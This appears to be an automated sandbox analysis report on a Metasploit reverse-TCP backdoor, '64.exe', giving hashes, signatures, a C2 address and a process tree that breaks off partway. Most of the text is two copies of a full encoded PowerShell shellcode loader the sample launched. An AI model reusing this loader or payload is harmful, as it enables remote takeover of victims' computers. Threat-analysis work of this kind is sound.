metasploit | 4a959711034c61595815416f395941e167dfa6d26869414ca78512c7a1f1b0d9

Analysis

max time kernel
122s
max time network
125s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
17-08-2023 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64.exe
Size

119KB
MD5

fece896351e7f582e4992e9e595f4cf5
SHA1

9bb5820af40e2ea582c40610d9f14cc7f38faa1e
SHA256

4a959711034c61595815416f395941e167dfa6d26869414ca78512c7a1f1b0d9
SHA512

66d4f65abc4dfb8a8bbd112759275f4710187195f3644a0c6a556087aeaee249ad138e252494c18f90c8d1518b5f0385ade2904ce0f2c1f34101beb90d1e1d32
SSDEEP

1536:QTr1kERVfkP6Ttdt3NIEzK1I0ZPwZONcBsYvIch8RwW0IHAufngutNbyaxuO/Y9p:QvmEnSWdFNI1hRqORp4ujtm

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

173.212.219.45:6006

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe
2	1220	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2552	powershell.exe
2672	powershell.exe
1220	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2332 wrote to memory of 2552	2332	64.exe	28
PID 2332 wrote to memory of 2552	2332	64.exe	28
PID 2332 wrote to memory of 2552	2332	64.exe	28
PID 2552 wrote to memory of 2672	2552	powershell.exe	30
PID 2552 wrote to memory of 2672	2552	powershell.exe	30
PID 2552 wrote to memory of 2672	2552	powershell.exe	30
PID 2672 wrote to memory of 1220	2672	powershell.exe	31
PID 2672 wrote to memory of 1220	2672	powershell.exe	31
PID 2672 wrote to memory of 1220	2672	powershell.exe	31
PID 2672 wrote to memory of 1220	2672	powershell.exe	31
PID 1220 wrote to memory of 2884	1220	powershell.exe	32
PID 1220 wrote to memory of 2884	1220	powershell.exe	32
PID 1220 wrote to memory of 2884	1220	powershell.exe	32
PID 1220 wrote to memory of 2884	1220	powershell.exe	32
PID 2884 wrote to memory of 2780	2884	csc.exe	33
PID 2884 wrote to memory of 2780	2884	csc.exe	33
PID 2884 wrote to memory of 2780	2884	csc.exe	33
PID 2884 wrote to memory of 2780	2884	csc.exe	33

C:\Users\Admin\AppData\Local\Temp\64.exe
"C:\Users\Admin\AppData\Local\Temp\64.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABoAEoANABzACAAPQAgACcAJABBAEsAdwBwACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEEASwB3AHAAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBmACwAMAB4AGMAYgAsADAAeAA2ADUALAAwAHgAOAA0ACwAMAB4AGQANAAsADAAeABkAGQALAAwAHgAYwA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADMAMQAsADAAeAA3ADgALAAwAHgAMABlACwAMAB4ADAAMwAsADAAeABiADMALAAwAHgANgBiACwAMAB4ADYANgAsADAAeAAyADEALAAwAHgAYgBmACwAMAB4ADkAYwAsADAAeABlADkALAAwAHgAYwBhACwAMAB4ADMAZgAsADAAeAA1AGQALAAwAHgAOQA2ACwAMAB4AGYAYgAsADAAeABlAGQALAAwAHgAMwA5ACwAMAB4AGQAZAAsADAAeABhAGUALAAwAHgAMgAxACwAMAB4ADQAOQAsADAAeABiADMALAAwAHgANAAyACwAMAB4AGMAOAAsADAAeABhADgALAAwAHgAYgBmACwAMAB4ADAAOQAsADAAeABkAGUALAAwAHgAYgA5ACwAMAB4AGIAMgAsADAAeAA4ADUALAAwAHgAZAAxACwAMAB4ADAAYQAsADAAeAA3ADgALAAwAHgAZgAwACwAMAB4AGQAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADMAYwAsADAAeABiADIALAAwAHgANAA4ACwAMAB4AGMAZQAsADAAeABjADAALAAwAHgAYwA4ACwAMAB4ADkAYwAsADAAeAAzADAALAAwAHgAZgA4ACwAMAB4ADAAMwAsADAAeABkADEALAAwAHgAMwAxACwAMAB4ADMAZAAsADAAeABkADIALAAwAHgAOQBmACwAMAB4AGQAZQAsADAAeAA5ADMALAAwAHgAYgAzACwAMAB4AGQANAAsADAAeAA3ADMALAAwAHgAMAA0ACwAMAB4AGIAMAAsADAAeABhADkALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYQA2ACwAMAB4AGYAMAAsADAAeAA1AGQALAAwAHgAMQAzACwAMAB4ADcAOQAsADAAeAA4ADQALAAwAHgAZAAxACwAMAB4ADEAYQAsADAAeABhAGEALAAwAHgAMwA1ACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgANQAyACwAMAB4ADMAZAAsADAAeAAyAGQALAAwAHgANAA0ACwAMAB4ADYAMwAsADAAeAA5ADIALAAwAHgANABiACwAMAB4ADQAZAAsADAAeAAxADcALAAwAHgAMgA4ACwAMAB4ADYANQAsADAAeABiADIALAAwAHgAOQAxACwAMAB4AGQAYgAsADAAeABiADEALAAwAHgAYwA3ACwAMAB4ADIAMwAsADAAeAAwAGEALAAwAHgAOAA4ACwAMAB4ADEANwAsADAAeABlADIALAAwAHgANwBkACwAMAB4AGUANgAsADAAeAAzAGIALAAwAHgAZQA0ACwAMAB4ADQANgAsADAAeABjADEALAAwAHgAYQAzACwAMAB4ADkAMgAsADAAeABiAGMALAAwAHgAMwAxACwAMAB4ADUAZQAsADAAeABhADUALAAwAHgAMAA2ACwAMAB4ADQAYgAsADAAeAA4ADQALAAwAHgAMgAwACwAMAB4ADkAOQAsADAAeABlAGIALAAwAHgANABmACwAMAB4ADkAMgAsADAAeAA3AGQALAAwAHgAMABkACwAMAB4ADkAYwAsADAAeAA0ADUALAAwAHgAZgA1ACwAMAB4ADAAMQAsADAAeAA2ADkALAAwAHgAMAAxACwAMAB4ADUAMQAsADAAeAAwADYALAAwAHgANgBjACwAMAB4AGMANgAsADAAeABlADkALAAwAHgAMwAyACwAMAB4AGUANQAsADAAeABlADkALAAwAHgAMwBkACwAMAB4AGIAMwAsADAAeABiAGQALAAwAHgAYwBkACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgA2ACwAMAB4ADYAZgAsADAAeABiAGIALAAwAHgANAA1ACwAMAB4AGMAOQAsADAAeAA5ADAALAAwAHgAZABiACwAMAB4ADIAMgAsADAAeABiADYALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeABjADEALAAwAHgAYQAxACwAMAB4ADQAOQAsADAAeAA1ADgALAAwAHgAMQBhACwAMAB4AGMAZQAsADAAeAAxADcALAAwAHgAYwBmACwAMAB4AGQANgAsADAAeAAwADIALAAwAHgAYQA4ACwAMAB4ADAAZgAsADAAeAA3ADEALAAwAHgAMQA1ACwAMAB4AGQAYgAsADAAeAAzAGQALAAwAHgAZABlACwAMAB4ADgAZAAsADAAeAA3ADMALAAwAHgAMABlACwAMAB4ADkANwAsADAAeAAwAGIALAAwAHgAOAAzACwAMAB4ADAANwAsADAAeABiAGYALAAwAHgAYQBjACwAMAB4ADUAYgAsADAAeABhAGYALAAwAHgAZAAwACwAMAB4ADUAMwAsADAAeAA1AGMALAAwAHgAZAAwACwAMAB4AGYAOQAsADAAeAA5ADcALAAwAHgAMAA4ACwAMAB4ADgAMAAsADAAeAA5ADEALAAwAHgAMwBlACwAMAB4ADMAMQAsADAAeAA0AGIALAAwAHgANgAyACwAMAB4AGIAZgAsADAAeABlADQALAAwAHgAZQA2ACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAYQBhACwAMAB4ADIAMwAsADAAeABiADcALAAwAHgAOABhACwAMAB4AGQAYwAsADAAeABjADkALAAwAHgANAA4ACwAMAB4AGMAMwAsADAAeAA2AGEALAAwAHgANAA3ACwAMAB4AGEAZQAsADAAeABiAGIALAAwAHgAYwAyACwAMAB4ADAANwAsADAAeAA3AGYALAAwAHgANwBiACwAMAB4AGIAMwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4ADEAMAAsADAAeAAwADMALAAwAHgAZQAyACwAMAB4ADIAZAAsADAAeAAzADkALAAwAHgAYQA5ACwAMAB4ADAAZAAsADAAeAA5ADgALAAwAHgAMQAxACwAMAB4ADQANQAsADAAeABiADcALAAwAHgAOAAxACwAMAB4AGUAYQAsADAAeABmADQALAAwAHgAMwA4ACwAMAB4ADEAYwAsADAAeAA5ADcALAAwAHgAMwA2ACwAMAB4AGIAMgAsADAAeAA5ADMALAAwAHgANgA3ACwAMAB4AGYAOAAsADAAeAAzADMALAAwAHgAZAA5ACwAMAB4ADcAYgAsADAAeAA2AGMALAAwAHgAYgA0ACwAMAB4ADkANAAsADAAeAAyADYALAAwAHgAMwBhACwAMAB4AGMAYgAsADAAeAAwADIALAAwAHgANABjACwAMAB4AGMAMgAsADAAeAA1ADkALAAwAHgAYQA5ACwAMAB4AGMANwAsADAAeAA5ADUALAAwAHgAZgA1ACwAMAB4AGIAMwAsADAAeAAzAGUALAAwAHgAZAAxACwAMAB4ADUAOQAsADAAeAA0AGIALAAwAHgAMQA1ACwAMAB4ADYAYQAsADAAeAA1ADMALAAwAHgAZAA5ACwAMAB4AGQANgAsADAAeAAwADQALAAwAHgAOQBjACwAMAB4ADAAZAAsADAAeABkADcALAAwAHgAZAA0ACwAMAB4AGMAYQAsADAAeAA0ADcALAAwAHgAZAA3ACwAMAB4AGIAYwAsADAAeABhAGEALAAwAHgAMwAzACwAMAB4ADgANAAsADAAeABkADkALAAwAHgAYgA0ACwAMAB4AGUAOQAsADAAeABiADgALAAwAHgANwAyACwAMAB4ADIAMQAsADAAeAAxADIALAAwAHgAZQA5ACwAMAB4ADIANwAsADAAeABlADIALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAAxAGUALAAwAHgAYwA0ACwAMAB4ADIANAAsADAAeABlADgALAAwAHgANwA1ACwAMAB4AGQANAAsADAAeAAxADkALAAwAHgAMwBmACwAMAB4AGIAMwAsADAAeABhADIALAAwAHgANwAzACwAMAB4ADgAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUQA5AHQASAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUQA5AHQASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUQA5AHQASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGgASgA0AHMAKQApADsAJABIAHgASAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFAAMQBIAEcAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAUAAxAEgARwAgACQASAB4AEgAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQASAB4AEgAIAAkAGUAIgA7AH0A
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABoAEoANABzACAAPQAgACcAJABBAEsAdwBwACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEEASwB3AHAAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBmACwAMAB4AGMAYgAsADAAeAA2ADUALAAwAHgAOAA0ACwAMAB4AGQANAAsADAAeABkAGQALAAwAHgAYwA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADMAMQAsADAAeAA3ADgALAAwAHgAMABlACwAMAB4ADAAMwAsADAAeABiADMALAAwAHgANgBiACwAMAB4ADYANgAsADAAeAAyADEALAAwAHgAYgBmACwAMAB4ADkAYwAsADAAeABlADkALAAwAHgAYwBhACwAMAB4ADMAZgAsADAAeAA1AGQALAAwAHgAOQA2ACwAMAB4AGYAYgAsADAAeABlAGQALAAwAHgAMwA5ACwAMAB4AGQAZAAsADAAeABhAGUALAAwAHgAMgAxACwAMAB4ADQAOQAsADAAeABiADMALAAwAHgANAAyACwAMAB4AGMAOAAsADAAeABhADgALAAwAHgAYgBmACwAMAB4ADAAOQAsADAAeABkAGUALAAwAHgAYgA5ACwAMAB4AGIAMgAsADAAeAA4ADUALAAwAHgAZAAxACwAMAB4ADAAYQAsADAAeAA3ADgALAAwAHgAZgAwACwAMAB4AGQAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADMAYwAsADAAeABiADIALAAwAHgANAA4ACwAMAB4AGMAZQAsADAAeABjADAALAAwAHgAYwA4ACwAMAB4ADkAYwAsADAAeAAzADAALAAwAHgAZgA4ACwAMAB4ADAAMwAsADAAeABkADEALAAwAHgAMwAxACwAMAB4ADMAZAAsADAAeABkADIALAAwAHgAOQBmACwAMAB4AGQAZQAsADAAeAA5ADMALAAwAHgAYgAzACwAMAB4AGQANAAsADAAeAA3ADMALAAwAHgAMAA0ACwAMAB4AGIAMAAsADAAeABhADkALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYQA2ACwAMAB4AGYAMAAsADAAeAA1AGQALAAwAHgAMQAzACwAMAB4ADcAOQAsADAAeAA4ADQALAAwAHgAZAAxACwAMAB4ADEAYQAsADAAeABhAGEALAAwAHgAMwA1ACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgANQAyACwAMAB4ADMAZAAsADAAeAAyAGQALAAwAHgANAA0ACwAMAB4ADYAMwAsADAAeAA5ADIALAAwAHgANABiACwAMAB4ADQAZAAsADAAeAAxADcALAAwAHgAMgA4ACwAMAB4ADYANQAsADAAeABiADIALAAwAHgAOQAxACwAMAB4AGQAYgAsADAAeABiADEALAAwAHgAYwA3ACwAMAB4ADIAMwAsADAAeAAwAGEALAAwAHgAOAA4ACwAMAB4ADEANwAsADAAeABlADIALAAwAHgANwBkACwAMAB4AGUANgAsADAAeAAzAGIALAAwAHgAZQA0ACwAMAB4ADQANgAsADAAeABjADEALAAwAHgAYQAzACwAMAB4ADkAMgAsADAAeABiAGMALAAwAHgAMwAxACwAMAB4ADUAZQAsADAAeABhADUALAAwAHgAMAA2ACwAMAB4ADQAYgAsADAAeAA4ADQALAAwAHgAMgAwACwAMAB4ADkAOQAsADAAeABlAGIALAAwAHgANABmACwAMAB4ADkAMgAsADAAeAA3AGQALAAwAHgAMABkACwAMAB4ADkAYwAsADAAeAA0ADUALAAwAHgAZgA1ACwAMAB4ADAAMQAsADAAeAA2ADkALAAwAHgAMAAxACwAMAB4ADUAMQAsADAAeAAwADYALAAwAHgANgBjACwAMAB4AGMANgAsADAAeABlADkALAAwAHgAMwAyACwAMAB4AGUANQAsADAAeABlADkALAAwAHgAMwBkACwAMAB4AGIAMwAsADAAeABiAGQALAAwAHgAYwBkACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgA2ACwAMAB4ADYAZgAsADAAeABiAGIALAAwAHgANAA1ACwAMAB4AGMAOQAsADAAeAA5ADAALAAwAHgAZABiACwAMAB4ADIAMgAsADAAeABiADYALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeABjADEALAAwAHgAYQAxACwAMAB4ADQAOQAsADAAeAA1ADgALAAwAHgAMQBhACwAMAB4AGMAZQAsADAAeAAxADcALAAwAHgAYwBmACwAMAB4AGQANgAsADAAeAAwADIALAAwAHgAYQA4ACwAMAB4ADAAZgAsADAAeAA3ADEALAAwAHgAMQA1ACwAMAB4AGQAYgAsADAAeAAzAGQALAAwAHgAZABlACwAMAB4ADgAZAAsADAAeAA3ADMALAAwAHgAMABlACwAMAB4ADkANwAsADAAeAAwAGIALAAwAHgAOAAzACwAMAB4ADAANwAsADAAeABiAGYALAAwAHgAYQBjACwAMAB4ADUAYgAsADAAeABhAGYALAAwAHgAZAAwACwAMAB4ADUAMwAsADAAeAA1AGMALAAwAHgAZAAwACwAMAB4AGYAOQAsADAAeAA5ADcALAAwAHgAMAA4ACwAMAB4ADgAMAAsADAAeAA5ADEALAAwAHgAMwBlACwAMAB4ADMAMQAsADAAeAA0AGIALAAwAHgANgAyACwAMAB4AGIAZgAsADAAeABlADQALAAwAHgAZQA2ACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAYQBhACwAMAB4ADIAMwAsADAAeABiADcALAAwAHgAOABhACwAMAB4AGQAYwAsADAAeABjADkALAAwAHgANAA4ACwAMAB4AGMAMwAsADAAeAA2AGEALAAwAHgANAA3ACwAMAB4AGEAZQAsADAAeABiAGIALAAwAHgAYwAyACwAMAB4ADAANwAsADAAeAA3AGYALAAwAHgANwBiACwAMAB4AGIAMwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4ADEAMAAsADAAeAAwADMALAAwAHgAZQAyACwAMAB4ADIAZAAsADAAeAAzADkALAAwAHgAYQA5ACwAMAB4ADAAZAAsADAAeAA5ADgALAAwAHgAMQAxACwAMAB4ADQANQAsADAAeABiADcALAAwAHgAOAAxACwAMAB4AGUAYQAsADAAeABmADQALAAwAHgAMwA4ACwAMAB4ADEAYwAsADAAeAA5ADcALAAwAHgAMwA2ACwAMAB4AGIAMgAsADAAeAA5ADMALAAwAHgANgA3ACwAMAB4AGYAOAAsADAAeAAzADMALAAwAHgAZAA5ACwAMAB4ADcAYgAsADAAeAA2AGMALAAwAHgAYgA0ACwAMAB4ADkANAAsADAAeAAyADYALAAwAHgAMwBhACwAMAB4AGMAYgAsADAAeAAwADIALAAwAHgANABjACwAMAB4AGMAMgAsADAAeAA1ADkALAAwAHgAYQA5ACwAMAB4AGMANwAsADAAeAA5ADUALAAwAHgAZgA1ACwAMAB4AGIAMwAsADAAeAAzAGUALAAwAHgAZAAxACwAMAB4ADUAOQAsADAAeAA0AGIALAAwAHgAMQA1ACwAMAB4ADYAYQAsADAAeAA1ADMALAAwAHgAZAA5ACwAMAB4AGQANgAsADAAeAAwADQALAAwAHgAOQBjACwAMAB4ADAAZAAsADAAeABkADcALAAwAHgAZAA0ACwAMAB4AGMAYQAsADAAeAA0ADcALAAwAHgAZAA3ACwAMAB4AGIAYwAsADAAeABhAGEALAAwAHgAMwAzACwAMAB4ADgANAAsADAAeABkADkALAAwAHgAYgA0ACwAMAB4AGUAOQAsADAAeABiADgALAAwAHgANwAyACwAMAB4ADIAMQAsADAAeAAxADIALAAwAHgAZQA5ACwAMAB4ADIANwAsADAAeABlADIALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAAxAGUALAAwAHgAYwA0ACwAMAB4ADIANAAsADAAeABlADgALAAwAHgANwA1ACwAMAB4AGQANAAsADAAeAAxADkALAAwAHgAMwBmACwAMAB4AGIAMwAsADAAeABhADIALAAwAHgANwAzACwAMAB4ADgAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUQA5AHQASAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUQA5AHQASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUQA5AHQASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGgASgA0AHMAKQApADsAJABIAHgASAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFAAMQBIAEcAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAUAAxAEgARwAgACQASAB4AEgAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQASAB4AEgAIAAkAGUAIgA7AH0A
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
